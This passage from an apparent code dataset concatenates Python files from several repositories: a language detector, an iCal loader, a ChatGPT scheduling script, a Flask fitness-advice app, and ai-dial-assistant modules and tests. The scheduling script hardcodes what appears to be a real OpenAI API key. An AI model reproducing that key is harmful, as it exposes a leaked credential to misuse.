decoded_sequence: str, threshold: float = 0.1, lg_inclusion: Optional[str] = None
) -> CoherenceMatches:
"""
Detect ANY language that can be identified in given sequence. The sequence will be analysed by layers.
A layer = Character extraction by alphabets/ranges.
"""
results = [] # type: List[Tuple[str, float]]
lg_inclusion_list = [] # type: List[str]
sufficient_match_count = 0 # type: int
if lg_inclusion is not None:
lg_inclusion_list = lg_inclusion.split(",")
if "Latin Based" in lg_inclusion_list:
lg_inclusion_list.remove("Latin Based")
for layer in alpha_unicode_split(decoded_sequence):
sequence_frequencies = Counter(layer) # type: Counter
most_common = sequence_frequencies.most_common()
character_count = sum([o for c, o in most_common]) # type: int
if character_count <= 32:
continue
popular_character_ordered = [c for c, o in most_common] # type: List[str]
for language in lg_inclusion_list or alphabet_languages(
popular_character_ordered
):
ratio = characters_popularity_compare(
language, popular_character_ordered
) # type: float
if ratio < threshold:
continue
elif ratio >= 0.8:
sufficient_match_count += 1
results.append((language, round(ratio, 4)))
if sufficient_match_count >= 3:
break
return sorted(results, key=lambda x: x[1], reverse=True)
| [] |
2024-01-10 | anhquande/chatgpt | loaders~ical_loader.py | from icalendar import Calendar
from langchain.document_loaders.directory import DirectoryLoader
from pydantic import BaseModel, Field
import logging
from datetime import datetime
from typing import Optional
class Event(BaseModel):
summary: Optional[str] = Field(default=None, allow_none=True)
description: Optional[str] = Field(default=None, allow_none=True)
start_time: datetime
end_time: Optional[datetime] = Field(default=None, allow_none=True)
page_content: Optional[str] = Field(default=None, allow_none=True)
metadata: Optional[dict] = Field(default=None, allow_none=True)
def __init__(self, summary: Optional[str] = None,
description: Optional[str] = None,
start_time: datetime = None,
end_time: Optional[datetime] = None,
metadata: Optional[dict] = None,
):
super().__init__(summary=summary, description=description, start_time=start_time, end_time=end_time, metadata=metadata)
self.page_content = f"{summary or ''} {description or ''}"
class ICalLoader(DirectoryLoader):
def __init__(self, folder):
super().__init__(folder, glob='*.ics')
self.logger = logging.getLogger(__name__) # Initialize logger
def _is_visible(self, p):
parts = p.parts
for _p in parts:
if _p.startswith("."):
return False
return True
def load_file(self, item, path, docs, pbar=None):
if item.is_file():
if self._is_visible(item.relative_to(path)) or self.load_hidden:
try:
with open(item, 'rb') as f:
cal = Calendar.from_ical(f.read())
# Process the iCalendar events as desired
for component in cal.walk():
if component.name == 'VEVENT':
# Extract event properties and create a document object
summary = component.get('summary')
description = component.get('description')
start_time = datetime.fromisoformat(component.get('dtstart').dt.isoformat())
end_time = component.get('dtend')
if end_time is not None:
end_time = datetime.fromisoformat(end_time.dt.isoformat())
event = Event(
summary=summary,
description=description,
start_time=start_time,
end_time=end_time,
metadata = {'source': 'google calendar'}
)
# Create a document object and append it to the list
docs.append(event)
except Exception as e:
self.logger.warning(e)
if self.silent_errors:
self.logger.warning(e)
else:
raise e
finally:
if pbar:
pbar.update(1)
| [] |
2024-01-10 | gochipon/DIS23-d | shedule.py | import openai
openai.api_key = "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"
def Ask_ChatGPT(message):
# 応答設定
completion = openai.ChatCompletion.create(
model = "gpt-3.5-turbo",
messages = [{
"role":"system",
"content":'あなたは優秀なアシスタントです。'},
{
"role":"user",
"content":message,
}],
max_tokens = 1024,
n = 1,
stop = None,
temperature = 0.5,
)
# 応答
response = completion.choices[0].message["content"]
# 応答内容出力
return response
# 目標の取得
goal = input("あなたの達成したい目標は何ですか?: ")
# 期限の取得
deadline = input("その目標の達成期限はいつですか?: ")
# GPT-3に1週間のスケジュールを生成させる
prompt = f"私は{goal}を{deadline}までに達成したい。今日からの1週間のスケジュールをjson形式で提案してください。"
massage = Ask_ChatGPT(prompt)
# print(response)
print(massage) | [
"あなたは優秀なアシスタントです。",
"私はPLACEHOLDERをPLACEHOLDERまでに達成したい。今日からの1週間のスケジュールをjson形式で提案してください。"
] |
2024-01-10 | Ahmed98041/completefitnessgpt | FlaskGym.py | from flask import Flask, request, jsonify
from flask_cors import CORS # Importing the CORS library
import openai
import os
from dotenv import load_dotenv
# Load the environment variables from the .env file
load_dotenv('key.env')
# Set up your OpenAI API key
openai.api_key = os.getenv('OPENAI_API_KEY')
app = Flask(__name__, static_folder='static')
# Enable CORS for all origins
CORS(app)
def fitness_evaluation(age, height_meters, weight_kg, gender, activity_levels_1highest, free_time_daily_hours, a_pwd, additional_info, user_goals, target_muscles, available_days, existing_workout_plan):
messages = []
messages.append({
"role": "system",
"content": "You are a specialized fitness AI tasked with generating detailed and personalized fitness and diet plans for individuals based on a variety of input parameters. Your task is to create a tailored plan that takes into consideration the user's age, height, weight, gender, activity level, daily free time, personal goals, target muscles, available days for workouts, and existing workout plans. Please divide the output into two sections: a fitness plan and a diet plan. The fitness plan should be presented in a grid format where each cell represents a day and outlines the workouts targeting the specified muscles for that day. The diet plan should complement the fitness plan and be structured according to different meals throughout the day. Make sure to craft plans that suit a wide range of demographics."
})
pwd = "a pwd" if a_pwd else "not a pwd"
additional_info = additional_info if additional_info else "nothing"
message = f"Give a person with age of {age}, height of {height_meters} meters, weight of {weight_kg} kg, activity levels of {activity_levels_1highest} with 1 being the highest activity level, free time daily of {free_time_daily_hours} in hours, is {pwd}, and has additional info of {additional_info}. User goals: {user_goals}. Target muscles: {', '.join(target_muscles)}. Available days: {', '.join(available_days)}. Existing workout plan: {existing_workout_plan}"
messages.append({"role": "user", "content": message})
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
temperature=0.7,
)
reply = response["choices"][0]["message"]["content"]
fitness_advice = [{"title": "Fitness Advice", "content": reply}]
return fitness_advice
@app.route("/fitness_advice", methods=["POST"])
def get_fitness_advice():
# Get user inputs from the JSON body
data = request.get_json()
age = data["age"]
height_meters = float(data["height_meters"])
weight_kg = int(data["weight_kg"])
gender = data["gender"]
activity_levels_1highest = data["activity_levels_1highest"]
free_time_daily_hours = float(data["free_time_daily_hours"])
a_pwd = data["a_pwd"]
additional_info = data["additional_info"]
user_goals = data["user_goals"]
target_muscles = data["target_muscles"]
available_days = data["available_days"]
existing_workout_plan = data["existing_workout_plan"]
# Call the fitness_evaluation function and get the results
fitness_advice = fitness_evaluation(age, height_meters, weight_kg, gender, activity_levels_1highest, free_time_daily_hours, a_pwd, additional_info, user_goals, target_muscles, available_days, existing_workout_plan)
return jsonify(fitness_advice=fitness_advice)
if __name__ == "__main__":
app.run(debug=True)
| [
"f\"Give a person with age of {age}, height of {height_meters} meters, weight of {weight_kg} kg, activity levels of {activity_levels_1highest} with 1 being the highest activity level, free time daily of {free_time_daily_hours} in hours, is {pwd}, and has additional info of {additional_info}. User goals: {user_goals}. Target muscles: {', '.join(target_muscles)}. Available days: {', '.join(available_days)}. Existing workout plan: {existing_workout_plan}",
"You are a specialized fitness AI tasked with generating detailed and personalized fitness and diet plans for individuals based on a variety of input parameters. Your task is to create a tailored plan that takes into consideration the user's age, height, weight, gender, activity level, daily free time, personal goals, target muscles, available days for workouts, and existing workout plans. Please divide the output into two sections: a fitness plan and a diet plan. The fitness plan should be presented in a grid format where each cell represents a day and outlines the workouts targeting the specified muscles for that day. The diet plan should complement the fitness plan and be structured according to different meals throughout the day. Make sure to craft plans that suit a wide range of demographics."
] |
2024-01-10 | epam/ai-dial-assistant | tests~unit_tests~chain~test_command_chain_best_effort.py | import json
from unittest.mock import MagicMock, Mock, call
import pytest
from aidial_sdk.chat_completion import Role
from jinja2 import Template
from openai import InvalidRequestError
from aidial_assistant.chain.callbacks.chain_callback import ChainCallback
from aidial_assistant.chain.callbacks.result_callback import ResultCallback
from aidial_assistant.chain.command_chain import (
CommandChain,
LimitExceededException,
ModelRequestLimiter,
)
from aidial_assistant.chain.history import History, ScopedMessage
from aidial_assistant.commands.base import Command, TextResult
from aidial_assistant.model.model_client import Message, ModelClient
from tests.utils.async_helper import to_async_string, to_async_strings
SYSTEM_MESSAGE = "<system message>"
USER_MESSAGE = "<user message>"
ENFORCE_JSON_FORMAT = "\n\n**Protocol reminder: reply with commands**"
BEST_EFFORT_ANSWER = "<best effort answer>"
NO_TOKENS_ERROR = "No tokens left"
FAILED_PROTOCOL_ERROR = "The next constructed API request is incorrect."
LIMIT_EXCEEDED_ERROR = "<limit exceeded error>"
TEST_COMMAND_NAME = "<test command>"
TEST_COMMAND_OUTPUT = "<test command result>"
TEST_COMMAND_REQUEST = json.dumps(
{"commands": [{"command": TEST_COMMAND_NAME, "args": ["test_arg"]}]}
)
TEST_COMMAND_RESPONSE = json.dumps(
{"responses": [{"status": "SUCCESS", "response": TEST_COMMAND_OUTPUT}]}
)
TEST_HISTORY = History(
assistant_system_message_template=Template(
"system_prefix={{system_prefix}}"
),
best_effort_template=Template(
"user_message={{message}}, error={{error}}, dialogue={{dialogue}}"
),
scoped_messages=[
ScopedMessage(
message=Message(role=Role.SYSTEM, content=SYSTEM_MESSAGE)
),
ScopedMessage(message=Message(role=Role.USER, content=USER_MESSAGE)),
],
)
@pytest.mark.asyncio
async def test_model_doesnt_support_protocol():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
["cannot reply in JSON format", BEST_EFFORT_ANSWER]
)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={},
max_retry_count=0,
)
chain_callback = Mock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", "The model failed to construct addon request."),
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(USER_MESSAGE),
]
),
]
@pytest.mark.asyncio
async def test_model_partially_supports_protocol():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
[
TEST_COMMAND_REQUEST,
"cannot reply in JSON format anymore",
BEST_EFFORT_ANSWER,
]
)
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
succeeded_dialogue = [
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(TEST_COMMAND_RESPONSE),
]
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", "The model failed to construct addon request."),
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={FAILED_PROTOCOL_ERROR}, dialogue={succeeded_dialogue}"
),
]
),
]
@pytest.mark.asyncio
async def test_no_tokens_for_tools():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = [
to_async_string(TEST_COMMAND_REQUEST),
InvalidRequestError(NO_TOKENS_ERROR, ""),
to_async_string(BEST_EFFORT_ANSWER),
]
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", NO_TOKENS_ERROR)
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={NO_TOKENS_ERROR}, dialogue=[]"
),
]
),
]
@pytest.mark.asyncio
async def test_model_request_limit_exceeded():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
[TEST_COMMAND_REQUEST, BEST_EFFORT_ANSWER]
)
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
model_request_limiter = Mock(spec=ModelRequestLimiter)
model_request_limiter.verify_limit.side_effect = [
None,
LimitExceededException(LIMIT_EXCEEDED_ERROR),
]
await command_chain.run_chat(
history=TEST_HISTORY,
callback=chain_callback,
model_request_limiter=model_request_limiter,
)
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={LIMIT_EXCEEDED_ERROR}, dialogue=[]"
),
]
),
]
assert model_request_limiter.verify_limit.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
]
| [
"<system message>",
"<user message>"
] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~exceptions.py | import logging
from functools import wraps
from aidial_sdk import HTTPException
from openai import OpenAIError
logger = logging.getLogger(__name__)
class RequestParameterValidationError(Exception):
def __init__(self, message: str, param: str, *args: object) -> None:
super().__init__(message, *args)
self._param = param
@property
def param(self) -> str:
return self._param
def _to_http_exception(e: Exception) -> HTTPException:
if isinstance(e, RequestParameterValidationError):
return HTTPException(
message=str(e),
status_code=422,
type="invalid_request_error",
param=e.param,
)
if isinstance(e, OpenAIError):
http_status = e.http_status or 500
if e.error:
return HTTPException(
message=e.error.message,
status_code=http_status,
type=e.error.type,
code=e.error.code,
param=e.error.param,
)
return HTTPException(message=str(e), status_code=http_status)
return HTTPException(
message=str(e), status_code=500, type="internal_server_error"
)
def unhandled_exception_handler(func):
@wraps(func)
async def wrapper(*args, **kwargs):
try:
return await func(*args, **kwargs)
except Exception as e:
logger.exception("Unhandled exception")
raise _to_http_exception(e)
return wrapper
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~open_api~operation_selector.py | import json
from typing import Union
from urllib.parse import urljoin
from langchain.tools import APIOperation, OpenAPISpec
from pydantic import BaseModel
class OpenAPICommand(BaseModel):
command: str
args: dict
class OpenAPIClarification(BaseModel):
user_question: str
OpenAPIResponse = Union[OpenAPICommand, OpenAPIClarification]
class OpenAPIResponseWrapper(BaseModel):
"""Just a wrapper class for the union to ease parsing"""
resp: OpenAPIResponse
@staticmethod
def parse_str(s) -> OpenAPIResponse:
return OpenAPIResponseWrapper.parse_obj({"resp": json.loads(s)}).resp
OpenAPIOperations = dict[str, APIOperation]
def collect_operations(spec: OpenAPISpec, spec_url: str) -> OpenAPIOperations:
operations: dict[str, APIOperation] = {}
def add_operation(spec, path, method):
operation = APIOperation.from_openapi_spec(spec, path, method) # type: ignore
operation.base_url = urljoin(spec_url, operation.base_url)
operations[operation.operation_id] = operation
if spec.paths is None: # type: ignore
return operations
for path, path_item in spec.paths.items(): # type: ignore
if path_item.get is not None:
add_operation(spec, path, "get")
if path_item.post is not None:
add_operation(spec, path, "post")
return operations
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~model~model_client.py | from abc import ABC
from typing import Any, AsyncIterator, List, TypedDict
import openai
from aidial_sdk.chat_completion import Role
from aiohttp import ClientSession
from pydantic import BaseModel
class ReasonLengthException(Exception):
pass
class Message(BaseModel):
role: Role
content: str
def to_openai_message(self) -> dict[str, str]:
return {"role": self.role.value, "content": self.content}
@classmethod
def system(cls, content):
return cls(role=Role.SYSTEM, content=content)
@classmethod
def user(cls, content):
return cls(role=Role.USER, content=content)
@classmethod
def assistant(cls, content):
return cls(role=Role.ASSISTANT, content=content)
class Usage(TypedDict):
prompt_tokens: int
completion_tokens: int
class ExtraResultsCallback:
def on_discarded_messages(self, discarded_messages: int):
pass
def on_prompt_tokens(self, prompt_tokens: int):
pass
async def _flush_stream(stream: AsyncIterator[str]):
try:
async for _ in stream:
pass
except ReasonLengthException:
pass
class ModelClient(ABC):
def __init__(
self,
model_args: dict[str, Any],
buffer_size: int,
):
self.model_args = model_args
self.buffer_size = buffer_size
self._total_prompt_tokens: int = 0
self._total_completion_tokens: int = 0
async def agenerate(
self,
messages: List[Message],
extra_results_callback: ExtraResultsCallback | None = None,
**kwargs,
) -> AsyncIterator[str]:
async with ClientSession(read_bufsize=self.buffer_size) as session:
openai.aiosession.set(session)
model_result = await openai.ChatCompletion.acreate(
messages=[message.to_openai_message() for message in messages],
**self.model_args | kwargs,
)
finish_reason_length = False
async for chunk in model_result: # type: ignore
usage: Usage | None = chunk.get("usage")
if usage:
prompt_tokens = usage["prompt_tokens"]
self._total_prompt_tokens += prompt_tokens
self._total_completion_tokens += usage["completion_tokens"]
if extra_results_callback:
extra_results_callback.on_prompt_tokens(prompt_tokens)
if extra_results_callback:
discarded_messages: int | None = chunk.get(
"statistics", {}
).get("discarded_messages")
if discarded_messages is not None:
extra_results_callback.on_discarded_messages(
discarded_messages
)
choice = chunk["choices"][0]
text = choice["delta"].get("content")
if text:
yield text
if choice.get("finish_reason") == "length":
finish_reason_length = True
if finish_reason_length:
raise ReasonLengthException()
# TODO: Use a dedicated endpoint for counting tokens.
# This request may throw an error if the number of tokens is too large.
async def count_tokens(self, messages: list[Message]) -> int:
class PromptTokensCallback(ExtraResultsCallback):
def __init__(self):
self.token_count: int | None = None
def on_prompt_tokens(self, prompt_tokens: int):
self.token_count = prompt_tokens
callback = PromptTokensCallback()
await _flush_stream(
self.agenerate(
messages, extra_results_callback=callback, max_tokens=1
)
)
if callback.token_count is None:
raise Exception("No token count received.")
return callback.token_count
# TODO: Use a dedicated endpoint for discarded_messages.
async def get_discarded_messages(
self, messages: list[Message], max_prompt_tokens: int
) -> int:
class DiscardedMessagesCallback(ExtraResultsCallback):
def __init__(self):
self.message_count: int | None = None
def on_discarded_messages(self, discarded_messages: int):
self.message_count = discarded_messages
callback = DiscardedMessagesCallback()
await _flush_stream(
self.agenerate(
messages,
extra_results_callback=callback,
max_prompt_tokens=max_prompt_tokens,
max_tokens=1,
)
)
if callback.message_count is None:
raise Exception("No message count received.")
return callback.message_count
@property
def total_prompt_tokens(self) -> int:
return self._total_prompt_tokens
@property
def total_completion_tokens(self) -> int:
return self._total_completion_tokens
| [
"prompt_tokens"
] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~chain~command_chain.py | import json
import logging
from abc import ABC, abstractmethod
from typing import Any, AsyncIterator, Callable, Tuple, cast
from aidial_sdk.chat_completion.request import Role
from openai import InvalidRequestError
from aidial_assistant.application.prompts import ENFORCE_JSON_FORMAT_TEMPLATE
from aidial_assistant.chain.callbacks.chain_callback import ChainCallback
from aidial_assistant.chain.callbacks.command_callback import CommandCallback
from aidial_assistant.chain.callbacks.result_callback import ResultCallback
from aidial_assistant.chain.command_result import (
CommandInvocation,
CommandResult,
Status,
commands_to_text,
responses_to_text,
)
from aidial_assistant.chain.dialogue import Dialogue, DialogueTurn
from aidial_assistant.chain.history import History
from aidial_assistant.chain.model_response_reader import (
AssistantProtocolException,
CommandsReader,
skip_to_json_start,
)
from aidial_assistant.commands.base import Command, FinalCommand
from aidial_assistant.json_stream.chunked_char_stream import ChunkedCharStream
from aidial_assistant.json_stream.exceptions import JsonParsingException
from aidial_assistant.json_stream.json_node import JsonNode
from aidial_assistant.json_stream.json_parser import JsonParser
from aidial_assistant.json_stream.json_string import JsonString
from aidial_assistant.model.model_client import Message, ModelClient
from aidial_assistant.utils.stream import CumulativeStream
logger = logging.getLogger(__name__)
DEFAULT_MAX_RETRY_COUNT = 3
# Some relatively large number to avoid CxSAST warning about potential DoS attack.
# Later, the upper limit will be provided by the DIAL Core (proxy).
MAX_MODEL_COMPLETION_CHUNKS = 32000
CommandConstructor = Callable[[], Command]
CommandDict = dict[str, CommandConstructor]
class LimitExceededException(Exception):
pass
class ModelRequestLimiter(ABC):
@abstractmethod
async def verify_limit(self, messages: list[Message]):
pass
class CommandChain:
def __init__(
self,
name: str,
model_client: ModelClient,
command_dict: CommandDict,
max_completion_tokens: int | None = None,
max_retry_count: int = DEFAULT_MAX_RETRY_COUNT,
):
self.name = name
self.model_client = model_client
self.command_dict = command_dict
self.model_extra_args = (
{}
if max_completion_tokens is None
else {"max_tokens": max_completion_tokens}
)
self.max_retry_count = max_retry_count
def _log_message(self, role: Role, content: str):
logger.debug(f"[{self.name}] {role.value}: {content}")
def _log_messages(self, messages: list[Message]):
if logger.isEnabledFor(logging.DEBUG):
for message in messages:
self._log_message(message.role, message.content)
async def run_chat(
self,
history: History,
callback: ChainCallback,
model_request_limiter: ModelRequestLimiter | None = None,
):
dialogue = Dialogue()
try:
messages = history.to_protocol_messages()
while True:
dialogue_turn = await self._run_with_protocol_failure_retries(
callback,
messages + dialogue.messages,
model_request_limiter,
)
if dialogue_turn is None:
break
dialogue.append(dialogue_turn)
except (JsonParsingException, AssistantProtocolException):
messages = (
history.to_best_effort_messages(
"The next constructed API request is incorrect.",
dialogue,
)
if not dialogue.is_empty()
else history.to_user_messages()
)
await self._generate_result(messages, callback)
except (InvalidRequestError, LimitExceededException) as e:
if dialogue.is_empty() or (
isinstance(e, InvalidRequestError) and e.code == "429"
):
raise
# Assuming the context length is exceeded
dialogue.pop()
# TODO: Limit the error message size. The error message should not exceed reserved assistant overheads.
await self._generate_result(
history.to_best_effort_messages(str(e), dialogue), callback
)
async def _run_with_protocol_failure_retries(
self,
callback: ChainCallback,
messages: list[Message],
model_request_limiter: ModelRequestLimiter | None = None,
) -> DialogueTurn | None:
last_error: Exception | None = None
try:
self._log_messages(messages)
retries = Dialogue()
while True:
all_messages = self._reinforce_json_format(
messages + retries.messages
)
if model_request_limiter:
await model_request_limiter.verify_limit(all_messages)
chunk_stream = CumulativeStream(
self.model_client.agenerate(
all_messages, **self.model_extra_args # type: ignore
)
)
try:
commands, responses = await self._run_commands(
chunk_stream, callback
)
if responses:
request_text = commands_to_text(commands)
response_text = responses_to_text(responses)
callback.on_state(request_text, response_text)
return DialogueTurn(
assistant_message=request_text,
user_message=response_text,
)
break
except (JsonParsingException, AssistantProtocolException) as e:
logger.exception("Failed to process model response")
retry_count = retries.dialogue_turn_count()
callback.on_error(
"Error"
if retry_count == 0
else f"Error (retry {retry_count})",
"The model failed to construct addon request.",
)
if retry_count >= self.max_retry_count:
raise
last_error = e
retries.append(
DialogueTurn(
assistant_message=chunk_stream.buffer,
user_message="Failed to parse JSON commands: "
+ str(e),
)
)
finally:
self._log_message(Role.ASSISTANT, chunk_stream.buffer)
except (InvalidRequestError, LimitExceededException) as e:
if last_error:
# Retries can increase the prompt size, which may lead to token overflow.
# Thus, if the original error was a protocol error, it should be thrown instead.
raise last_error
callback.on_error("Error", str(e))
raise
async def _run_commands(
self, chunk_stream: AsyncIterator[str], callback: ChainCallback
) -> Tuple[list[CommandInvocation], list[CommandResult]]:
char_stream = ChunkedCharStream(chunk_stream)
await skip_to_json_start(char_stream)
root_node = await JsonParser().parse(char_stream)
commands: list[CommandInvocation] = []
responses: list[CommandResult] = []
request_reader = CommandsReader(root_node)
async for invocation in request_reader.parse_invocations():
command_name = await invocation.parse_name()
command = self._create_command(command_name)
args = invocation.parse_args()
if isinstance(command, FinalCommand):
if len(responses) > 0:
continue
message = await anext(args)
await CommandChain._to_result(
message
if isinstance(message, JsonString)
else message.to_chunks(),
callback.result_callback(),
)
break
else:
response = await CommandChain._execute_command(
command_name, command, args, callback
)
commands.append(
cast(CommandInvocation, invocation.node.value())
)
responses.append(response)
return commands, responses
def _create_command(self, name: str) -> Command:
if name not in self.command_dict:
raise AssistantProtocolException(
f"The command '{name}' is expected to be one of {[*self.command_dict.keys()]}"
)
return self.command_dict[name]()
async def _generate_result(
self, messages: list[Message], callback: ChainCallback
):
stream = self.model_client.agenerate(messages)
await CommandChain._to_result(stream, callback.result_callback())
@staticmethod
def _reinforce_json_format(messages: list[Message]) -> list[Message]:
last_message = messages[-1]
return messages[:-1] + [
Message(
role=last_message.role,
content=ENFORCE_JSON_FORMAT_TEMPLATE.render(
response=last_message.content
),
),
]
@staticmethod
async def _to_args(
args: AsyncIterator[JsonNode], callback: CommandCallback
) -> AsyncIterator[Any]:
args_callback = callback.args_callback()
args_callback.on_args_start()
async for arg in args:
arg_callback = args_callback.arg_callback()
arg_callback.on_arg_start()
result = ""
async for chunk in arg.to_chunks():
arg_callback.on_arg(chunk)
result += chunk
arg_callback.on_arg_end()
yield json.loads(result)
args_callback.on_args_end()
@staticmethod
async def _to_result(stream: AsyncIterator[str], callback: ResultCallback):
try:
for _ in range(MAX_MODEL_COMPLETION_CHUNKS):
chunk = await anext(stream)
callback.on_result(chunk)
logger.warning(
f"Max chunk count of {MAX_MODEL_COMPLETION_CHUNKS} exceeded in the reply"
)
except StopAsyncIteration:
pass
@staticmethod
async def _execute_command(
name: str,
command: Command,
args: AsyncIterator[JsonNode],
chain_callback: ChainCallback,
) -> CommandResult:
try:
with chain_callback.command_callback() as command_callback:
command_callback.on_command(name)
args_list = [
arg
async for arg in CommandChain._to_args(
args, command_callback
)
]
response = await command.execute(
args_list, command_callback.execution_callback()
)
command_callback.on_result(response)
return {"status": Status.SUCCESS, "response": response.text}
except Exception as e:
logger.exception(f"Failed to execute command {name}")
return {"status": Status.ERROR, "response": str(e)}
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~commands~open_api.py | from typing import Any, List
from langchain.tools.openapi.utils.api_models import APIOperation
from typing_extensions import override
from aidial_assistant.commands.base import (
Command,
ExecutionCallback,
ResultObject,
)
from aidial_assistant.open_api.requester import OpenAPIEndpointRequester
class OpenAPIChatCommand(Command):
@staticmethod
def token() -> str:
return "open-api-chat-command"
def __init__(self, op: APIOperation, plugin_auth: str | None):
self.op = op
self.plugin_auth = plugin_auth
@override
async def execute(
self, args: List[Any], execution_callback: ExecutionCallback
) -> ResultObject:
self.assert_arg_count(args, 1)
return await OpenAPIEndpointRequester(
self.op, self.plugin_auth
).execute(args[0])
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~open_ai_plugin.py | import logging
from typing import Iterable, Mapping
from urllib.parse import urljoin
from aiocache import cached
from aiohttp import hdrs
from fastapi import HTTPException
from langchain.tools import OpenAPISpec
from pydantic import BaseModel, parse_obj_as
from starlette.status import HTTP_401_UNAUTHORIZED
from aidial_assistant.utils.requests import aget
logger = logging.getLogger(__name__)
class AuthConf(BaseModel):
type: str
authorization_type: str = "bearer"
class ApiConf(BaseModel):
type: str
url: str
has_user_authentication: bool = False
is_user_authenticated: bool = False
class AIPluginConf(BaseModel):
schema_version: str
name_for_model: str
name_for_human: str
description_for_model: str
description_for_human: str
auth: AuthConf
api: ApiConf
logo_url: str
contact_email: str
legal_info_url: str
class OpenAIPluginInfo(BaseModel):
ai_plugin: AIPluginConf
open_api: OpenAPISpec
class AddonTokenSource:
def __init__(self, headers: Mapping[str, str], urls: Iterable[str]):
self.headers = headers
self.urls = {
url: f"x-addon-token-{index}" for index, url in enumerate(urls)
}
def get_token(self, url: str) -> str | None:
return self.headers.get(self.urls[url])
@property
def default_auth(self) -> str | None:
return self.headers.get(hdrs.AUTHORIZATION)
def get_plugin_auth(
auth_type: str,
authorization_type: str,
url: str,
token_source: AddonTokenSource,
) -> str | None:
if auth_type == "none":
return token_source.default_auth
if auth_type == "service_http":
service_token = token_source.get_token(url)
if service_token is None:
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail=f"Missing token for {url}",
)
# Capitalizing because Wolfram, for instance, doesn't like lowercase bearer
return f"{authorization_type.capitalize()} {service_token}"
raise HTTPException(
status_code=HTTP_401_UNAUTHORIZED,
detail=f"Unknown auth type {auth_type}",
)
async def get_open_ai_plugin_info(addon_url: str) -> OpenAIPluginInfo:
"""Takes url pointing to .well-known/ai-plugin.json file"""
logger.info(f"Fetching plugin info from {addon_url}")
ai_plugin = await _parse_ai_plugin_conf(addon_url)
# Resolve relative url
ai_plugin.api.url = urljoin(addon_url, ai_plugin.api.url)
logger.info(f"Fetching plugin spec from {ai_plugin.api.url}")
open_api = await _parse_openapi_spec(ai_plugin.api.url)
